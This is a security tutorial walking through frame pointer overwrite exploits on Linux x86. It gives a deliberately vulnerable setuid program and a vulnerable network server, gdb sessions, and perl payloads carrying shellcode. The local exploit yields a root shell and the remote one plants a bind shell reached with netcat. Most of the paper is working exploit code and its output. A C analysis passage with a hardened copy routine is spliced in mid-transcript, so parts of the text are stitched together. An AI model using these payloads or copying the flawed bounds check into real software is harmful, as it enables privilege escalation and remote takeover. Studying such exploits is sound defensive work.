Jeremy Brown [0xjbrown41@gmail.com / jbrownsec.blogspot.com]

Frame Pointer Overwrite Demonstration [LINUX]

This paper assumes you have read the proper background information and/or technical details about the above subject. If not, please do so first, because this read does not cover the key concepts; it consists of technical exploitation examples. That being said, enjoy. Knowledge is power.

[PART 1 + LOCAL]

bugs@linux:~$ cat fpo.c
#include <stdio.h>   /* printf */
#include <stdlib.h>  /* exit */
#include <string.h>  /* memset, strlen */

void die()
{
    printf("Protection Enabled!\n");
    exit(0);
}

void vuln(char *data)
{
    char buf[1024], buf2[12];
    int i = 0;

    memset(buf, 0, 1024);

    /* The limit is sizeof(buf) + sizeof(buf2) + 1 = 1037, but the loop only
       ever writes into the 1024-byte buf, so up to 12 bytes past its end
       get through. */
    if(strlen(data) < sizeof(buf)+sizeof(buf2)+1)
    {
        while(*data)
            buf[i++] = *data++;
    }
    else
    {
        die();
    }
}

int main(int argc, char *argv[])
{
    if(argc < 2)
    {
        printf("usage: %s data\n", argv[0]);
        return 0;
    }

    vuln(argv[1]);

    return 0;
}
bugs@linux:~$ gcc -o fpo fpo.c

This program is vulnerable to a buffer overflow, but there are conditions. In our environment we need at least 16 bytes past the buffer size to overwrite the EIP, yet the program only lets us fill the buffer with around 1036 bytes. Anything over 1036 bytes prints "Protection Enabled!", goes to die() and ends the program. Now that you know what we're working with, let's see what we can do.

bugs@linux:~$ ./fpo
usage: ./fpo data
bugs@linux:~$ su
Password:
root@linux:/home/bugs# chown root:root fpo && chmod 4755 fpo
root@linux:/home/bugs# exit
exit
bugs@linux:~$ ls -alh fpo
-rwsr-xr-x 1 root root 8.4K 2008-11-27 03:12 fpo*
bugs@linux:~$ gdb fpo
GNU gdb 6.5
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) break main
Breakpoint 1 at 0x80484df
(gdb) disas vuln
Dump of assembler code for function vuln:
0x08048464 <vuln+0>:    push   %ebp
0x08048465 <vuln+1>:    mov    %esp,%ebp
0x08048467 <vuln+3>:    sub    $0x428,%esp
0x0804846d <vuln+9>:    movl   $0x0,0xfffffbe4(%ebp)
0x08048477 <vuln+19>:   sub    $0x4,%esp
0x0804847a <vuln+22>:   push   $0x400
0x0804847f <vuln+27>:   push   $0x0
0x08048481 <vuln+29>:   lea    0xfffffbf8(%ebp),%eax
0x08048487 <vuln+35>:   push   %eax
0x08048488 <vuln+36>:   call   0x8048358 <memset@plt>
0x0804848d <vuln+41>:   add    $0x10,%esp
0x08048490 <vuln+44>:   sub    $0xc,%esp
0x08048493 <vuln+47>:   pushl  0x8(%ebp)
0x08048496 <vuln+50>:   call   0x8048318 <strlen@plt>
0x0804849b <vuln+55>:   add    $0x10,%esp
0x0804849e <vuln+58>:   cmp    $0x40c,%eax
0x080484a3 <vuln+63>:   ja     0x80484d2 <vuln+110>
0x080484a5 <vuln+65>:   mov    0x8(%ebp),%eax
0x080484a8 <vuln+68>:   cmpb   $0x0,(%eax)
0x080484ab <vuln+71>:   je     0x80484d7 <vuln+115>
0x080484ad <vuln+73>:   mov    0xfffffbe4(%ebp),%eax
0x080484b3 <vuln+79>:   lea    0xfffffff8(%ebp),%edx
0x080484b6 <vuln+82>:   add    %edx,%eax
0x080484b8 <vuln+84>:   lea    0xfffffc00(%eax),%edx
0x080484be <vuln+90>:   mov    0x8(%ebp),%eax
0x080484c1 <vuln+93>:   incl   0x8(%ebp)
0x080484c4 <vuln+96>:   mov    (%eax),%al
0x080484c6 <vuln+98>:   mov    %al,(%edx)
0x080484c8 <vuln+100>:  lea    0xfffffbe4(%ebp),%eax
0x080484ce <vuln+106>:  incl   (%eax)
0x080484d0 <vuln+108>:  jmp    0x80484a5 <vuln+65>
0x080484d2 <vuln+110>:  call   0x8048444 <die>
0x080484d7 <vuln+115>:  leave
0x080484d8 <vuln+116>:  ret
End of assembler dump.
(gdb) break *vuln+115
Breakpoint 2 at 0x80484d7
(gdb) r `perl -e 'print "A" x 1040'`
Starting program: /home/bugs/fpo `perl -e 'print "A" x 1040'`

Breakpoint 1, 0x080484df in main ()
(gdb) c
Continuing.
Protection Enabled!

Program exited normally.
(gdb) r `perl -e 'print "A" x 1036'`
Starting program: /home/bugs/fpo `perl -e 'print "A" x 1036'`

Breakpoint 1, 0x080484df in main ()
(gdb) x/x $ebp
0xbffff0c8:     0xbffff0e8          *** 0xbffff0e8 --> _init saved ebp
(gdb) x/x $ebp+4
0xbffff0cc:     0x4004728b          *** 0x4004728b --> main()'s return address
(gdb) c
Continuing.
Breakpoint 2, 0x080484d7 in vuln ()
(gdb) x/12x $esp
0xbfffec70:     0x00000000      0x00000000      0x400174dc      0x0000040c
0xbfffec80:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffec90:     0x41414141      0x41414141      0x41414141      0x41414141
                *** 0xbfffec90 --> buffer's address
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x0804852c in main ()
(gdb) i r
eax            0xbffff65b       -1073744293
ecx            0x414141         4276545
edx            0xbffff09b       -1073745765
ebx            0x4015bff0       1075167216
esp            0xbffff0b0       0xbffff0b0
ebp            0x41414141       0x41414141
esi            0xbffff120       -1073745632
edi            0x2              2
eip            0x804852c        0x804852c
eflags         0x10282          [ SF IF RF ]
cs             0x23             35
ss             0x2b             43
ds             0x2b             43
es             0x2b             43
fs             0x0              0
gs             0x0              0

We can overflow the buffer, but because of the 'protection' check not far enough to overwrite the EIP. Sometimes, though, control of the EBP leads to control of the EIP as well: the overwritten frame pointer becomes main()'s stack pointer when main() executes its own leave/ret, so main() returns through whatever address we place in that fake frame. So let's put our information together and see if we can smash this stack.

filler            [A * 8]                      8 bytes
_init saved ebp   [\xe8\xf0\xff\xbf]           4 bytes
main()'s retaddr  [\x8b\x72\x04\x40]           4 bytes
target eip        [\x41\x41\x41\x41 * 254]     1016 bytes
buffer's address  [\x90\xec\xff\xbf]           4 bytes

The filler doesn't matter much (it is occasionally helpful); if you don't want to use it, increase the target eip count instead.

Total size of payload: 1036 bytes

(gdb) r `perl -e 'print "A" x 8 . "\xe8\xf0\xff\xbf" . "\x8b\x72\x04\x40" . "\x41\x41\x41\x41" x 254 . "\x90\xec\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bugs/fpo `perl -e 'print "A" x 8 . "\xe8\xf0\xff\xbf" . "\x8b\x72\x04\x40" . "\x41\x41\x41\x41" x 254 . "\x90\xec\xff\xbf"'`

Breakpoint 1, 0x080484df in main ()
(gdb) c
Continuing.

Breakpoint 2, 0x080484d7 in vuln ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0x0              0
ecx            0xbfffec         12582892
edx            0xbffff09b       -1073745765
ebx            0x4015bff0       1075167216
esp            0xbfffec98       0xbfffec98
ebp            0x41414141       0x41414141
esi            0xbffff120       -1073745632
edi            0x2              2
eip            0x41414141       0x41414141
eflags         0x10282          [ SF IF RF ]
cs             0x23             35
ss             0x2b             43
ds             0x2b             43
es             0x2b             43
fs             0x0              0
gs             0x0              0

As you can see, we have now overwritten both the EBP and the EIP. Let's get out of here and execute some code =)

(gdb) q
bugs@linux:~$ cat env.c
#include <stdio.h>   /* printf */
#include <stdlib.h>  /* getenv */

int main(int argc, char *argv[])
{
    char *addr;

    if(argc < 2)
    {
        printf("usage: %s <var>\n", argv[0]);
        return 0;
    }

    /* print where the named environment variable sits on the stack */
    addr = getenv(argv[1]);

    if(addr == NULL)
    {
        printf("[%s] not found!\n", argv[1]);
        return 0;
    }

    printf("[%s] @ %p\n", argv[1], addr);

    return 0;
}
bugs@linux:~$ gcc -o env env.c
bugs@linux:~$ ./env
usage: ./env
bugs@linux:~$ export NOPSC=`perl -e 'print "\x90" x 200 . "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
bugs@linux:~$ ./env NOPSC
[NOPSC] @ 0xbffff768
bugs@linux:~$ ./fpo `perl -e 'print "A" x 8 . "\xe8\xf0\xff\xbf" . "\x8b\x72\x04\x40" . "\x68\xf7\xff\xbf" x 254 . "\x90\xec\xff\xbf"'`
sh-3.1# id
uid=0(root) gid=100(users) groups=100(users)
sh-3.1# exit
exit
bugs@linux:~$

[PART 2 + REMOTE]

[Terminal #1]

#include <stdio.h>       /* printf */
#include <stdlib.h>      /* atoi */
#include <string.h>      /* memset, strlen */
#include <unistd.h>      /* read, close */
#include <sys/socket.h>  /* socket, bind, listen, accept */
#include <netinet/in.h>  /* sockaddr_in, htons, INADDR_ANY */

#define READSZ 2048

int readsock(int sock);

void die(int sock)
{
    printf("Protection Enabled!\n");
    close(sock);
}

void vuln(char *data, int sock)
{
    char buf[1024], buf2[12];
    int i = 0;

    memset(buf, 0, 1024);

    if(strlen(data) < sizeof(buf)+sizeof(buf2)+1)
    {
        while(*data)
            buf[i++] = *data++;
    }
    /* Same condition as above, so die() is never reached; the disassembly
       below shows this second strlen() check and the call as written. */
    else if(strlen(data) < sizeof(buf)+sizeof(buf2)+1)
    {
        die(sock);
    }
}

int main(int argc, char *argv[])
{
    if(argc < 2)
    {
        printf("Usage: %s port\n", argv[0]);
        return 0;
    }

    struct sockaddr_in client, server;
    socklen_t z = sizeof(client);
    int cli, serv, port = atoi(argv[1]);

    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = INADDR_ANY;

    if((serv = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        printf("Error: socket()\n");
        return -1;
    }

    if(bind(serv, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1)
    {
        printf("Error: bind()\n");
        return -1;
    }

    if(listen(serv, 10) == -1)
    {
        printf("Error: listen()\n");
        return -1;
    }

    for(;;)
    {
        cli = accept(serv, (struct sockaddr *)&client, &z);

        if(readsock(cli) == -1)
        {
            printf("Error: readsock()\n");
            close(cli);
        }
    }

    return 0;
}

int readsock(int sock)
{
    char readbuf[READSZ];

    memset(readbuf, 0, READSZ);
    /* read() takes three arguments; keep the last byte as a terminator */
    read(sock, readbuf, READSZ - 1);

    vuln(readbuf, sock);
    close(sock);

    return 0;
}

bugs@linux:~$ gcc -o fposerv fposerv.c
bugs@linux:~$ ./fposerv
Usage: ./fposerv port
bugs@linux:~$ gdb fposerv
GNU gdb 6.5
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-linux"...Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x8048673
(gdb) disas vuln
Dump of assembler code for function vuln:
0x080485da <vuln+0>:    push   %ebp
0x080485db <vuln+1>:    mov    %esp,%ebp
0x080485dd <vuln+3>:    sub    $0x428,%esp
0x080485e3 <vuln+9>:    movl   $0x0,0xfffffbe4(%ebp)
0x080485ed <vuln+19>:   sub    $0x4,%esp
0x080485f0 <vuln+22>:   push   $0x400
0x080485f5 <vuln+27>:   push   $0x0
0x080485f7 <vuln+29>:   lea    0xfffffbf8(%ebp),%eax
0x080485fd <vuln+35>:   push   %eax
0x080485fe <vuln+36>:   call   0x80484a8 <memset@plt>
0x08048603 <vuln+41>:   add    $0x10,%esp
0x08048606 <vuln+44>:   sub    $0xc,%esp
0x08048609 <vuln+47>:   pushl  0x8(%ebp)
0x0804860c <vuln+50>:   call   0x8048448 <strlen@plt>
0x08048611 <vuln+55>:   add    $0x10,%esp
0x08048614 <vuln+58>:   cmp    $0x40c,%eax
0x08048619 <vuln+63>:   ja     0x8048648 <vuln+110>
0x0804861b <vuln+65>:   mov    0x8(%ebp),%eax
0x0804861e <vuln+68>:   cmpb   $0x0,(%eax)
0x08048621 <vuln+71>:   je     0x804866b <vuln+145>
0x08048623 <vuln+73>:   mov    0xfffffbe4(%ebp),%eax
0x08048629 <vuln+79>:   lea    0xfffffff8(%ebp),%edx
0x0804862c <vuln+82>:   add    %edx,%eax
0x0804862e <vuln+84>:   lea    0xfffffc00(%eax),%edx
0x08048634 <vuln+90>:   mov    0x8(%ebp),%eax
0x08048637 <vuln+93>:   incl   0x8(%ebp)
0x0804863a <vuln+96>:   mov    (%eax),%al
0x0804863c <vuln+98>:   mov    %al,(%edx)
0x0804863e <vuln+100>:  lea    0xfffffbe4(%ebp),%eax
0x08048644 <vuln+106>:  incl   (%eax)
0x08048646 <vuln+108>:  jmp    0x804861b <vuln+65>
0x08048648 <vuln+110>:  sub    $0xc,%esp
0x0804864b <vuln+113>:  pushl  0x8(%ebp)
0x0804864e <vuln+116>:  call   0x8048448 <strlen@plt>
0x08048653 <vuln+121>:  add    $0x10,%esp
0x08048656 <vuln+124>:  cmp    $0x40c,%eax
0x0804865b <vuln+129>:  ja     0x804866b <vuln+145>
0x0804865d <vuln+131>:  sub    $0xc,%esp
0x08048660 <vuln+134>:  pushl  0xc(%ebp)
0x08048663 <vuln+137>:  call   0x80485b4 <die>
0x08048668 <vuln+142>:  add    $0x10,%esp
0x0804866b <vuln+145>:  leave
0x0804866c <vuln+146>:  ret
End of assembler dump.
(gdb) break *vuln+145
Breakpoint 2 at 0x804866b
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555

Breakpoint 1, 0x08048673 in main ()
(gdb) x/x $ebp
0xbffff4c8:     0xbffff4e8
(gdb) x/x $ebp+4
0xbffff4cc:     0x4004728b
(gdb) c
Continuing.

[Terminal #2]

bugs@linux:~$ perl -e 'print "\x44\x43\x42\x41" x 259' | nc localhost 5555

[Terminal #1]

Breakpoint 2, 0x0804866b in vuln ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08048825 in readsock ()
(gdb) i r
eax            0xbffff05c       -1073745828
ecx            0x0              0
edx            0xbfffec3b       -1073746885
ebx            0x4015bff0       1075167216
esp            0xbfffec44       0xbfffec44
ebp            0x41424344       0x41424344
esi            0xbffff520       -1073744608
edi            0x2              2
eip            0x8048825        0x8048825
eflags         0x10296          [ PF AF SF IF RF ]
cs             0x23             35
ss             0x2b             43
ds             0x2b             43
es             0x2b             43
fs             0x0              0
gs             0x0              0
(gdb) x/12x $esp
0xbfffec44:     0x00000007      0x00000800      0x00000000      0x41424344
0xbfffec54:     0x41424344      0x41424344      0x41424344      0x41424344
0xbfffec64:     0x41424344      0x41424344      0x41424344      0x41424344
(gdb) x/x 0xbfffec50
0xbfffec50:     0x41424344
(gdb) c
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555

Breakpoint 1, 0x08048673 in main ()
(gdb) c
Continuing.

[Terminal #2]

bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x44\x43\x42\x41" x 254 . "\x50\xec\xff\xbf"' | nc localhost 5555

[Terminal #1]

Breakpoint 2, 0x0804866b in vuln ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/x 0xbfffec50
0xbfffec50:     0x41414141
(gdb) x/x 0xbfffec60
0xbfffec60:     0x41424344
(gdb) c
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555

Breakpoint 1, 0x08048673 in main ()
(gdb) c
Continuing.

[Terminal #2]

bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x44\x43\x42\x41" x 254 . "\x60\xec\xff\xbf"' | nc localhost 5555

[Terminal #1]

Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) c
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
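The length check in the two vuln() functions above, together with the frame layout the disassembly shows (buf at ebp-0x408, saved ebp at ebp, return address at ebp+4), is why 1036 bytes reach the saved frame pointer while the 1040 needed for the return address are rejected. The C below is an added example, not code from the paper: it models that check against those offsets next to a bounded replacement for the copy loop, and all of its function names are its own.

```c
/* Added example, not code from the paper: it models the vuln() length check
 * against the frame layout in the disassembly (buf at ebp-0x408, saved ebp at
 * ebp+0, return address at ebp+4) and gives a bounded replacement for the copy
 * loop. All function names are this example's own. */
#include <stdlib.h>
#include <string.h>

#define BUF_SZ  1024    /* char buf[1024] in vuln()                       */
#define BUF2_SZ 12      /* char buf2[12]; only inflates the limit          */
#define BUF_OFF 0x408   /* buf starts at ebp-0x408 (lea 0xfffffbf8(%ebp)) */

/* The paper's check: accepts any input shorter than 1024+12+1 = 1037 bytes,
 * although the copy loop only ever writes into the 1024-byte buf. */
int flawed_check_accepts(size_t len)
{
    return len < BUF_SZ + BUF2_SZ + 1;
}

/* Offset from ebp of the last byte a copy of len bytes writes: the copy
 * covers [ebp-0x408, ebp-0x408+len). Saved ebp is [0,4), retaddr [4,8). */
long last_written_offset(size_t len) { return (long)len - BUF_OFF - 1; }

int clobbers_saved_ebp(size_t len)
{ return flawed_check_accepts(len) && last_written_offset(len) >= 3; }
int clobbers_return_address(size_t len)
{ return flawed_check_accepts(len) && last_written_offset(len) >= 7; }

/* Hardened copy: the limit is the real destination size, the copy is bounded
 * by it and the result is NUL-terminated. Returns -1 if data does not fit. */
int vuln_fixed(char *dst, size_t dstsz, const char *data)
{
    size_t len = strlen(data);
    if (dstsz == 0 || len >= dstsz)
        return -1;
    memcpy(dst, data, len);
    dst[len] = '\0';
    return (int)len;
}

/* Run a constructed input of len 'A's through vuln_fixed with a buf-sized
 * destination: -1 means rejected, otherwise the number of bytes copied. */
int fixed_result_for_len(size_t len)
{
    char dst[BUF_SZ], *in = malloc(len + 1);
    int r = -1;
    if (in != NULL) {
        memset(in, 'A', len);
        in[len] = '\0';
        r = vuln_fixed(dst, sizeof dst, in);
        free(in);
    }
    return r;
}
```

With these offsets, 1036 bytes is the only accepted length that fully covers the saved ebp, and no accepted length reaches the return address, which is exactly the situation the paper works around; the hardened copy rejects everything from 1024 bytes up.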
(gdb)

[Terminal #2]

bugs@linux:~$ pcalc 254*4          (previous return address buffer)
        1016            0x3f8           0y1111111000
bugs@linux:~$ pcalc 1016-800       (minus nops)
        216             0xd8            0y11011000
bugs@linux:~$ pcalc 216-84         (minus shellcode)
        132             0x84            0y10000100
bugs@linux:~$ pcalc 132/4          (new return address space)
        33              0x21            0y100001
bugs@linux:~$

[Terminal #1]

(gdb) r 5555
Starting program: /home/bugs/fposerv 5555

Breakpoint 1, 0x08048673 in main ()
(gdb) c
Continuing.

[Terminal #2]

bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x44\x43\x42\x41" x 33 . "\x90" x 800 . "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x60\xec\xff\xbf"' | nc localhost 5555

[Terminal #1]

Breakpoint 2, 0x0804866b in vuln ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) x/250x $esp
(gdb) d
Delete all breakpoints?
(y or n) y
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555

[Terminal #2]

Let's break down our final payload:

filler            [A * 8]                      8 bytes
_init saved ebp   [\xe8\xf0\xff\xbf]           4 bytes
main()'s retaddr  [\x8b\x72\x04\x40]           4 bytes
target eip        [\x08\xee\xff\xbf * 33]      132 bytes
nops              [\x90 * 800]                 800 bytes
shellcode         [\x6a.....\x80]              84 bytes
buffer's address  [\x90\xec\xff\xbf]           4 bytes

Total size of payload: 1036 bytes

bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x08\xee\xff\xbf" x 33 . "\x90" x 800 . "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x60\xec\xff\xbf"' | nc localhost 5555
[CTRL+C]
bugs@linux:~$ netstat -antp | grep 52972
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 0.0.0.0:52972           0.0.0.0:*               LISTEN      7089/fposerv
bugs@linux:~$ nc localhost 52972

[Terminal #1]

Program received signal SIGTRAP, Trace/breakpoint trap.
0x400007b0 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.

[Terminal #2]

id
uid=1000(bugs) gid=100(users) groups=100(users)
exit
bugs@linux:~$

Questions. Comments. Concerns. --> 0xjbrown41@gmail.com